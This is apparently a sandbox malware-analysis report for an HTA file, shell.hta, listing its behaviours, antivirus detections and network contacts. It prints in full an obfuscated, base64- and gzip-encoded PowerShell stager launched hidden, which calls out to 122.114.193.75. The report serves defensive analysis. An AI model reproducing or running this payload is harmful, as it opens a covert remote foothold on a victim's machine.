iC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000460	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 3, 2025, 2:46 p.m.	process_identifier: 2308 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x054c0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 3, 2025, 2:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW March 3, 2025, 2:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

122.114.193.75

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKU1imcCA7VWbW+bSBD+Xqn/AVVIgO{1}4vU'+'k{1}qdKBX3FMYoeAY/us0wYWvPHCu'+'rDEL73+9xswxOklucud1JUsw+zM7Owzz8zgJaHDCQsFx/scCd8/fhDyNUIRCgRZjEfmDpUEcdN{1}jpti5K+Fr4I'+'8V9frNgsQCRcXF60kinDID+/lHuZqHOPgnhIcy4rwpzBZ4gifXN8/YIcL3wXxj3KPsntEc7VdCzlLLJyooZvuDZmD0sD'+'K5poSLku//y4p85Paotz5liAay5K5izkOyi6lkiL8UNIDb3drLEs'+'GcSIWM4+XJyRs1MtW'+'GC'+'MPX4G3R2xgvmRuLMFdjreJME+iMLtU6uWgI0vwOIqYo7puhONYKgnz1P98sfhNnueH3yQhJwEu6yHHEVubOHokDo7LfRS6FN9gbwFWJo9I6C8UBdQe2QrLYphQWhL+ixv5Cm8K6N5rJD83Aq0Rj5QSZP{1}lNQ3mJhQfDKVX4jyQQIF1IAKg9yMF0CvIwxvqK9w5Coo1z3YwBCyPWEwy269CtSQYcDbiLNrBq3gbJVhZPMEtiPS09F5ftcIQzDYxCOY2I+7iaP5{1}5kWiN7ap0ts8bmO'+'PhLi9C1FAnIKq8mv5wB7FGRzlQu0K4pOlfAO7bUyxj3gKcUqLF2adgPAnWy0h1MWR6kBOY4gK0q38HMwha7KkhwYOALrDO/BU9KBAcKGdF'+'8WuOD19ByWpRVEcl4RRAhXqlAQ{1}I4rdkqCGMcm31ISz7FE6hmsklBMHxbxwt1D+Bmd+bIuFMY8SB5IKENyaa+wQRFNESkKfuFjbmcQvjpd'+'exaOFKIXKAU+PkA+QpDiYPKVKBJECLZSyibkerCkOQCPrF12KfOgOeXVkzEI+dqU3wiyq4E'+'D5FJcCkGdBQrJNynhJsEnEofukGG/i/xHBy56{1}hdKKcJ4YuSitubbjKfnFAKf8zMHJoIg4wNCNWKChGJ82D+1F/lS5Ji0V1lQPqeFoK1J{1}N6SmG/CzSENn7{1}P3c'+'vDQr0{1}t7dJ{1}9Vg3+qP2uN9vPg5Mu8nNjs4vRzo3OncPD6bav7GmfKar/VtSXU2b+/WA7M2h6k63ldO9tt9Ute3+wXe9advz/DPPvKl97pLhpDXWqnU0bHeS4'+'U{1}baNVm3CGb/phY49Wgy++nNkWWV/HvaueIbIfRg11jxl5X1d6y4ewHnt1bGu5u2q+c{1}5ortaOqrbBjdzV2O'+'dUidVSxra42tjraeAyyU7/iNUFG6'+'6yL+uvdxuJM9VUtaYYBWmo{1}u05m67ubJfjqQghGpdrUXbxlX4Y{1}Yj9WbNS74jO1NWjW3Dt736+j5WBmJ8PzWex2Bu2Npk5rnYHW7qmdG8vqzib'+'2aja5pbOJVZsx7GwqS/BBsHZtr+4rRs/Xl9uaD2edZf4DEtD7ul'+'s5t75o4ebSHz367nhydrO92'+'t3XmWpVKvYnSPXcIiFv1BciYmkf/PhB3EAPf5bwt5q8gaJ4iSgQAdp3UYpdFnXzjjxiJLWQ5Wysr3AUYgqjEIZlwWGVUuak8yDt3{1}CKDgMinVeWnsX02pMiPCkqxzlRiC4uZhAklAUEPMShz5el6rZRrUJ/r26rzYz/779Yi61'+'3spgWUDUtN9g9eKaZZ3BGPEGWfz1Q8A3AoSG9CdVbqMHRK2gg0M8OhZ1ipzFGnyOXX+uJBkfgALEa3HueDn9gB1if4G+CyNPR+HzUijHV1F9LmLw7LeHP/RfCHGX/sPsuElVLB2xeiH8WPOvqvxCBCSIcNE3osxQfpv6rQORF8iy/aXagCLx8pZ/B1wk/uYIPq6zR/wXj9kfofwsAAA{0}{0}')-f'=','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Creates a suspicious Powershell process (6 events)

option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

ClamAV	Vbs.Backdoor.Msfvenom_Payload-9951533-0
CTX	powershell.trojan.generic
CAT-QuickHeal	Script.Trojan.42447
Skyhigh	BehavesLike.HTML.Dropper.zr
ALYac	Trojan.Script.905440
VIPRE	Trojan.Script.905440
Sangfor	Trojan.Generic-Script.Save.4c97a2d4
Arcabit	Trojan.Script.DDD0E0
Baidu	VBS.Trojan-Downloader.Agent.va
Symantec	VBS.Heur.SNIC
ESET-NOD32	VBS/Agent.NUI
Avast	VBS:Obfuscated-GQ [Cryp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.VBS.Agent.gen
BitDefender	Trojan.Script.905440
NANO-Antivirus	Trojan.Html.Downloader.fqlyhy
MicroWorld-eScan	Trojan.Script.905440
Rising	Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP)
Emsisoft	Trojan.Script.905440 (B)
F-Secure	Backdoor:HTML/PowerShellStager.A
Sophos	Mal/PSDL-B
Ikarus	Trojan.PowerShell.Agent
FireEye	Trojan.Script.905440
Google	Detected
Avira	VBS/PSRunner.VPA
Kingsoft	Win32.Infected.AutoInfector.a
Xcitium	TrojWare.VBS.Agent.NUI@8a4oj4
Microsoft	TrojanDropper:VBS/PSRunner.G!MSR
GData	Trojan.Script.905440
Varist	VBS/Agent.AXB!Eldorado
McAfee	PS/Injector.d
Tencent	Heur:Trojan.Powershell.Generic.d
huorong	Trojan/HTML.Agent.a
Fortinet	VBS/Inject.B!tr
AVG	VBS:Obfuscated-GQ [Cryp]

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	122.114.193.75:443
dead_host	192.168.56.103:49166

shell.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All